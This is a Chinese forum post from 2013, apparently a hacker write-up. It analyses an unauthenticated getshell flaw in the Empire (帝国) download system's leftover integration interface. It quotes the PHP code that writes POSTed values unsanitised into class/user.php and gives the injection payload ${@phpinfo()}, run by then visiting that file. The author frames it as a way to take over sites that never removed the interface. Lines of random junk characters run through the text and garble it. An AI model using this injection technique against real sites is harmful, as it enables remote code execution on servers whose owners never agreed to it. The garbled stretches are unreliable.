这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们
: z0 e$ R; l% d9 Q6 R/ M$ ]9 n
& ~8 {+ I6 I4 a) h! i
4 D- V* ]/ P' o2 R+ x8 O+ ?6 r这是帝国的一套下载系统 如图8 M, P. {- G* B+ k$ ]4 ?5 z0 ]
ps(不需要任何账户和密码,直接写shell)
3 L6 ?9 s5 @: ?9 F/ [' }2 {6 p由于很多站是由于下载要整合discuz 等等一些论坛....' D" ~- D5 j, y
8 b9 v! }$ q. o5 L而帝国他又有一个万能接口,如图
8 Y z3 h) n) `5 }) A; t
+ D. m1 d0 A/ u1 I& q4 a2 m; m
" U0 f0 g% u7 b4 x" I p' m而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码
i/ j' j: A& B3 N3 Z* E
3 h; x2 P' B: K& M5 N' r当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig 1. if($_GET['install']==1) 2. { 3. @include("../class/connect.php"); 4. @include("../class/db_sql.php"); 5. @include("../class/functions.php"); 6. $link=db_connect(); 7. $empire=new mysqlquery(); 8. if($setup=="SetConfig") 9. { 10. SetUserCOMConfig($_POST); 11. } 12. elseif($setup=="alter") 13. { 14. InstallUserCOM(); 15. } 16. elseif($setup=="update") 17. { 18. UpdateUserCOM(); 19. } 20. else 21. {} 复制代码 他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪. j" D5 K: l. c
6 s1 v% |7 e2 ^/ d
在data/fun.php中的15行
+ y) q6 L1 P: q0 m, Z( B
' i) r3 T5 X, a% w我们可以看到这个函数 1. function SetUserCOMConfig($add){ 2. $filetext=ReadFiletext('data/user.php'); 3. if(empty($filetext)) 4. { 5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.'); 6. } 7. $vr=explode(",",ReturnRepUserVar()); 8. $count=count($vr); 9. for($i=0;$i<$count;$i++) 10. { 11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext); 12. } 13. //写入配置文件 14. $fp=@fopen("../class/user.php","w"); 15. if(!$fp) 16. {! Q0 c$ X2 v& w
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 18. } 19. @fputs($fp,$filetext); 20. @fclose($fp); 复制代码 .....//省略若干7 w2 d- t9 O6 N! _% [$ E
% n5 G: k- A4 ^% j8 ~! k这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
* W3 k2 T* `0 E* L, o& F% ?
8 f8 c8 ~7 v' G( u他将传进来的变量进行了切割,然后赋给了$filetext$ V) ~7 |' j! c8 ]$ [' r
9 ] p/ N t! r/ a- K$ y
然后看下面 1. //写入配置文件 2. $fp=@fopen("../class/user.php","w"); 3. if(!$fp) 4. { 5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 6. } 7. @fputs($fp,$filetext); 复制代码 打开了一个class/user.php文件,然后将$filetext写入了
' h4 d' B" C- s |; J ]; K3 a8 I7 W9 _
我们看看写入的结果,随便填一个 - Y& Q( Y O7 Z* Y1 b* c8 b
- G6 G8 p) x$ a( N8 n
3 P% C; M2 _- w2 W
' L9 p7 z5 W/ o( J6 ]( o* @' C, L* `
$ H! |: J, N) O$ E
+ i8 v2 }# Z# Y' z# W
) K4 p B$ } H2 {9 E, w, V6 @ Z: Y5 l8 ]4 R" R
# t9 ^5 U8 O2 d+ y' ?
7 X K# M; A" l6 w: A- L
# _; V8 W; z2 ~- j
; {3 u! ?* R1 T; @: t; x0 b. E( ]: T
: m2 }$ Y/ T- i$ u2 B2 N* E
, O# m& z3 E" J8 [ D
b$ B J; `* ]7 ?+ R& J3 \6 G% B" G# D/ j B: j4 `# c( i
* U8 W# d- a! N$ Y
& p. C4 H: L# I: x, o2 h" K/ b( m% R6 a
0 ]9 W0 j9 v' h* g
) c3 K& I4 H4 y5 M. u5 e1 p3 X
所以我们淫荡点,写个${@phpinfo()}试试
/ Y8 b. E, s d& u9 P然后访问以下class/user.php这个文件5 T+ A7 l. q, v; H3 m' m4 b
日了吧
3 g5 Y: i6 E: w8 p5 P- g* ]7 E5 T/ Y; M- p2 I! k
3 G+ Y: W6 u" t/ H/ ^2 n# V% ]
+ u" X, x& [# W3 U
1 X y5 F' t) a7 [
W2 n9 v$ o4 c6 d! u& X* x5 i I | 
发表于 2013-1-23 09:34:37
收藏
支持
反对